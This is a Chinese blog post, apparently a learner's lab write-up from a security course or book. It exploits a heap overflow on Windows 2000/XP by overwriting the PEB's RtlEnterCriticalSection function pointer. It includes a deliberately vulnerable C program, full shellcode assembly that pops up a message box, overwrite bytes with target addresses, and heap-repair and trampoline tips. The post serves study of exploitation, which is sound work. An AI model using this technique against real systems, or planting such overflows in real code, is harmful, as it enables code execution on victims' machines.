堆溢出 代码植入 狙击RtlEnterCriticalSection()函数指针

最新推荐文章于 2023-08-23 15:06:54 发布
最新推荐文章于 2023-08-23 15:06:54 发布
阅读量2.4k 收藏 1
点赞数 3
分类专栏: # 堆&栈 文章标签: 堆栈 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Misaka10046/article/details/108687282
版权

代码

#include <windows.h>
char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90……";
int main()
{
	HLOCAL h1 = 0, h2 = 0;
	HANDLE hp;
	hp = HeapCreate(0,0x1000,0x10000);
	h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,200);
	__asm int 3 //used to break process
	memcpy(h1,shellcode,0x200); //overflow,0x200=512
	h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
	return 0;
}

PEB中偏移为0x20,0x24的地方分别放着指向FastPebLockRoutine,和FastPebUnlockRoutine这两个函数的指针,这两个函数分别对应着函数的加锁与解锁,为多线程时,对该线程数据的保护操作,加上FastPebLockRoutine锁了之后,该段数据在同一时间只允许一个线程对其操作,如果要让另一线程使用该段数据必须使用FastPebUnlockRoutine解锁。
所以这次打算通过程序堆的异常使程序调用Exitprocess,调用Exitprocess时也会调用这两个函数,因此我们可以通过修改这两个函数的指针来起到劫持的作用。
h1向堆中申请了 200 字节的空间。memcpy 的上限错误地写成了 0x200,这实际上是 512 字节,所以会产生溢出。用伪造的指针覆盖尾块块首中的空表指针,当 h2 分配时,将导致 DWORD SHOOT。0x7FFDF020 处的 RtlEnterCriticalSection()函数指针,直接修改为 shellcode 的位置。DWORD SHOOT 完毕后,堆溢出导致异常,最终将调用 ExitProcess()结束进程。ExitProcess()在结束进程时需要调用临界区函数来同步线程,但却从 P.E.B 中拿出了指向 shellcode 的指针,因此 shellcode 被执行。

+0x020 FastPebLockRoutine : //PEB加锁
+0x024 FastPebUnlockRoutine : //解锁

实验目的

简单实现狙击RtlEnterCriticalSection()函数指针

实验准备

环境:windows xp
编译器:vc++
调试器:OD

实验过程

1.先写一个shellcode,大体上与之前的弹出窗口shellcode思路相仿,然后把200字节空间填满后,再溢出,把下一个尾块的空表指针给替换了,前向指针改成shellcode的起始地址,后向指针改成FastPebLockRoutine。这样相当于程序调用这个函数的时候就调用的是你的shellcode。
在这里插入图片描述

nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop            //填充
cld            //使DF标志位复位  
push 0x1E380A6A    
push 0x4FD18963
push 0x0C917432   //保存MassageBox,ExitProcess,LoadLibrary的hash值
mov esi,esp   //堆栈指针放入esi寄存器
lea edi,dword ptr ds:[esi-0xC] 

xor ebx,ebx
mov bh,0x4
sub esp,ebx

mov bx,0x3233
push ebx
push 0x72657375
push esp
xor edx,edx//user32

mov ebx,dword ptr fs:[edx+0x30]
mov ecx,dword ptr ds:[ebx+0xC]
mov ecx,dword ptr ds:[ecx+0x1C]
mov ecx,dword ptr ds:[ecx]
mov ebp,dword ptr ds:[ecx+0x8]//kernel32地址

lods dword ptr ds:[esi]
cmp eax,0x1E380A6A//比较MassageBox的hash值
jnz short 003A06E4
xchg eax,ebp
call dword ptr ds:[edi-0x8]//LoadLibrary(user32)
xchg eax,ebp

pushad
mov eax,dword ptr ss:[ebp+0x3C]//e_lfanew
mov ecx,dword ptr ss:[ebp+eax+0x78]
add ecx,ebp
mov ebx,dword ptr ds:[ecx+0x20]
add ebx,ebp//找到位于里面的导出函数名称表
xor edi,edi

inc edi
mov esi,dword ptr ds:[ebx+edi*4]
add esi,ebp//遍历名称
cdq

movsx eax,byte ptr ds:[esi]
cmp al,ah
je short 003A070B
ror edx,0x7
add edx,eax
inc esi
jmp short 003A06FC//hash算法

cmp edx,dword ptr ss:[esp+0x1C]
jnz short 003A06F5
mov ebx,dword ptr ds:[ecx+0x24]
add ebx,ebp
mov di,word ptr ds:[ebx+edi*2]
mov ebx,dword ptr ds:[ecx+0x1C]
add ebx,ebp
add ebp,dword ptr ds:[ebx+edi*4]
xchg eax,ebp
pop edi
stos dword ptr es:[edi]
push edi
popad
cmp eax,0x1E380A6A
jnz short 003A06D7//找到函数地址

xor ebx,ebx
push ebx
push 0x74736577
push 0x6C696166
mov eax,esp
push ebx
push eax
push eax
push ebx
call dword ptr ds:[edi-0x4]
push ebx
call dword ptr ds:[edi-0x8]//弹出窗口并退出
nop
nop
nop
nop
nop
nop
nop
nop
\x16\x01\x1A\x00\x00\x10\x00\x00// head of the free block
\x88\x06\x3a\x00//指向shellcode的开头
\x20\xf0\xfd\x7f//指向FastPebLockRoutine

2.但是直接把FastPebLockRoutine地址改了的话,shellcode中调用这个函数的函数就都没办法用了,所以修改一下shellcode前面。调用完函数进入shellcode之后再把FastPebLockRoutine还原。
(最后还是没有实验成功,应该是系统机制的问题,我改了FastPebLockRoutine的指针还是没弹出窗口,标准实验实在windows 2k下进行的,我是在xp下。改天下个2k的虚拟机重新整次,感觉好像是windows xp下FastPebLockRoutine指针的位置发生变化了)

MOV EAX,7FFDF020 
MOV EBX,[7FFDF020]
MOV [EAX],EBX

PS:之后又用windows2k试成功了
根据shellcode在2k中的位置进行调整

\x88\x06\x54\x00

根据FastPebLockRoutine指向的地址修改恢复的函数

\x03\x91\xF8\x77

最后成功了
在这里插入图片描述

总结

虽然这次没有成功。。函数的地方最后还是没找到。但是还是了解了下堆溢出的应用。
还是根据书上的简单做做总结吧。
首先堆调试要分调试态和常态,要用int 3去触发异常,然后再attach进程,不能直接拖进od,或者可以修改检测调试器的函数的检测值。比如修改IsDebugPresent的返回值。
还要注意修护环境,比如这次对FastPebLockRoutine指针的修改就必须要调回去,不然就会影响接下来的函数,同样shellcode开始时也要注意环境的初始化,不然一些符号标志位上可能会影响跳转。
在堆溢出中,有时还需要修复被我们折腾得乱七八糟的堆区。通常,比较简单修复堆区的
做法包括如下步骤。
(1)在堆区偏移 0x28 的地方存放着堆区所有空闲块的总和 TotalFreeSize。
(2)把一个较大块(或干脆直接找个暂时不用的区域伪造一个块首)块首中标识自身大小的两个字节(self size)修改成堆区空闲块总容量的大小(TotalFreeSize)。
(3)把该块的 flag 位设置为 0x10(last entry 尾块)。
(4)把 freelist[0]的前向指针和后向指针都指向这个堆块。
这样可以使整个堆区“看起来好像是”刚初始化完”只有一个大块的样子,不但可以继续完成分配工作,还保护了堆中已有的数据。(这方法太强了,相当于直接新开了一块堆区)
还有可能shellcode面对地址随机化的问题,要像栈溢出运用jmp esp定位一样,在程序中寻找跳板,因为堆溢出一般是把shellcode“绑定”到一个函数上的,因此可以用以下指令来起到跳板的作用。

CALL DWORD PTR [EDI + 0x78]
CALL DWORD PTR [ESI+0x4C]
CALL DWORD PTR [EBP+0x74]

(吾爱破解的OD不知道为什么int 3中断之后nop还是不能F7,F8。没办法观察堆。得要用原版的OD异常弹出之后才能仔细观察。下次整个原版OD慢慢再调次)

0xwangliang
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
解开 Windows 下的临界区中的代码死锁(转)
weixin_33842304的博客
11-25 277
摘要 临界区是一种防止多个线程同时执行一个特定代码节的机制,这一主题并没有引起太多关注,因而人们未能对其深刻理解。在需要跟踪代码中的多线程处理的性能时,对 Windows 中临界区的深刻理解非常有用。 本文深入研究临界区的原理,以揭示在查找死锁和确认性能问题过程中的有用信息。它还包含一个便利的实用工具程序,可以显示所有临界区及其当前状态。 在我们许多年的编程实践中,对于 Win32® 临界区没...
多线程锁详解之【临界区】
qq492927689的博客
06-24 1679
正文: 一般锁的类型可分为两种:用户态锁和内核态锁。用户态锁是指这个锁的代码只依赖于用户态,不会陷入内核态执行。而内核态锁很明显就是哪些会陷入内核态执行的锁。一般书中会说,windows 提供了两个用户态锁,一个是原子操作,而另外一个,正是我们要讨论的主题:临界区。原理: 临界区作为用户态最常用的锁,它的使用方法并不复杂,就是拥有初始化和反初始化函数,一对 lock 和 unlock 函数,当然还有一个不太常用的 trylock 函数。如下:(1)初始化临界区 InitializeCriticalSecti
Windows XP中的新型向量化异常处理
06-11 8066
 到现在为止我已在Win32®平台上工作八年有余,在这期间里我积累了一些我所喜欢使用的Win32功能(从API层面上来说)。它们可以让我的编程生活更轻松,同时也让我更容易写出比较有用的工具。当我安装完Windows XPBeta(以前代号为“Whistler”)时,并没有指望能够看到许多新的API,结果却惊喜地发现我错了!在本月的专栏中,我就要讲述这些新增功能其中之一——向量化
WinDbg -- 调试关键区(CriticalSection)死锁
zhanglidn013的专栏
10-16 665
一. 演示示例 这里一个有关键区锁死问题的程序,运行之后依次点击“CS锁死”按钮、右上角退出按钮,程序就会卡死。(图1) 对于眼下的这个问题,界面完全失去响应,这说明负责消息处理的UI线程阻塞了。对于几乎所有的windows GUI程序,编号为0的初始线程就是UI线程,windows发现该界面一段时间没有消息响应之后就会在标题后面加上“(未响应)”。 ...
查找死锁的方法
cys861214的专栏
11-07 1035
死锁主要是由于操作不当导致线程之间出现相互等待,一般有source code的和pdb就可以找到死锁的原因,只要在code中不出现terminatethread,一般均可找到原因。 若使用了第三方库,别人的code就不在我们的管控范围以内,很难定位到具体原因。 一般可以看到ntdll的临界区被占用,rtlEnterCriticalSection等待。此时又不知道被哪个线程占用,这种情况vs不能查
排查问题经验总结.docx
08-24
RtlEnterCriticalSection是Windows API中的一个互斥量函数,用于保护临界区,防止并发访问。而WaitForSingleObject则是一个通用的同步函数,它可以等待多种类型的同步对象,如事件、互斥体等。在死锁排查中,...
临界区
liyang_nash的专栏
11-21 918
函数 EnterCriticalSection 和 LeaveCriticalSection 声明如下: ? 1 2 3 4 5 6 WINBASEAPI VOID WINAPI EnterCriticalSection(     __inout LPCRITICAL_SECTION lpCriticalSection
记一次 .NET 某数控机床控制程序 卡死分析
一线码农的专栏
09-06 543
这个案例告诉我们:只要代码还能跑,就不要动它,它要是不动了,你得要做好动的准备。
记一次 .NET 某物管后台服务 卡死分析
dotNET跨平台
06-28 476
一:背景 1. 讲故事这几个月经常被朋友问,为什么不更新这个系列了,哈哈,确实停了好久,主要还是打基础去了,分析 dump 的能力不在于会灵活使用 windbg,而是对底层知识有一个深厚的理解,比如:汇编,C, C++,Win32 Api,虚拟内存,Windows 用户态和内核态,这是我今年看的书给大家分享一下。前段时候微信上有位朋友说他的程序出现了卡死,所有线程都不工作...
应用死锁的分析
mergerly的专栏
02-08 7574
一款软件嘟嘟启动时无法启动,卡死在某个地方,界面显示不出来,于是分析了一番。 启动利器Windbg,Attach到目标进程dudu_d.exe。 首先显示一下所有堆栈 0:007> ~*kb 0 Id: d2c.1abc Suspend: 1 Teb: 7efdd000 Unfrozen ChildEBP RetAddr Args to Child 0
在调试里看NV驱动栈溢出导致的连环死锁
格友
12-14 3767
最近我使用的一台PC随机出现应用程序卡死。卡死的程序可能是VirtualBox虚拟机,可能是资源管理器,也可能是其它软件。有时是一个程序卡死,有时是几个程序卡死,甚至是卡死一大片,整个系统不能动弹,只好触发蓝屏,或者强按4秒,关机重启。三次挂死    现在回想起来,第一次发生这个问题时,是在写一篇文章,正在收尾完工的时候,整个系统突然不能反应,屏幕全黑,但是老雷没有放弃,插了个USB键盘上去,过了
使用Windbg分析程序死锁小结
tpriwwq的专栏
12-02 4432
死锁场景描述:          针对之前一个版本反馈回来的问题,对数据通讯模块升级,做了精简和重构         因为ABA问题的存在,将之前以Socket为key改为以只增的Int为key。使用的锁为临界区锁。         修改完成,联调后进行压力测试,发现当后台的线程池满的时候会必然发生死锁。 死锁定位过程     第一步:精简线程模型,将授权检测线程、超时检测等辅助线程通通
Windebug 调试多线程程序死锁
FrankieWang008的专栏
07-31 3450
// CTestThreadDlg 对话框 class CTestThreadDlg : public CDialog { // 构造 public: CTestThreadDlg(CWnd* pParent = NULL); // 标准构造函数  // 对话框数据 enum { IDD = IDD_TESTTHREAD_DIALOG };  protected: virtua
WinDbg定位死锁问题
最新发布
过好每一天的女胖子
08-23 638
分析程序死锁
LeaveCriticalSection问题的解决方案
阅读修身
05-01 6875
1、问题描述 在VS2010执行过程之中,程序崩溃,出现了以下问题,导致程序中断。如图1所示 程序报错如下所示: *******************************************************************************/ void __cdecl _unlock ( int locknum ) {
第5章 溢出漏洞利用_狙击PEB中RtlEnterCritical-Section()的函数指针
yellow的博客
05-20 506
狙击PEB中RtlEnterCritical-Section()的函数指针
win7 ntdll.dll 6.1.7601.23915 crash 问题
jiankangshiye
03-03 5914
win7 ntdll.dll 6.1.7601.23915 crash 问题步骤 win7 32bit上面有两个用户,一个管理员用户,一个标准用户。 一天安装pdf printer的驱动,从网上随便找的*.inf驱动文件,安装没问题,使用print pdf功能时候电脑蓝屏。之后标准用户打开一个程序XXX.exe出现 ntdll.dll 6.1.7601.23915 crash问题。管理员用户打...
高级漏洞利用技术在APT对抗中的应用
此外,还有自动版本识别,找到通用的跳转地址和代码页地址,以及利用PEB(Process Environment Block)结构中的RtlEnterCriticalSection和RtlLeaveCriticalSection来控制执行流程。 5. **shellcode高级技术**:解码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值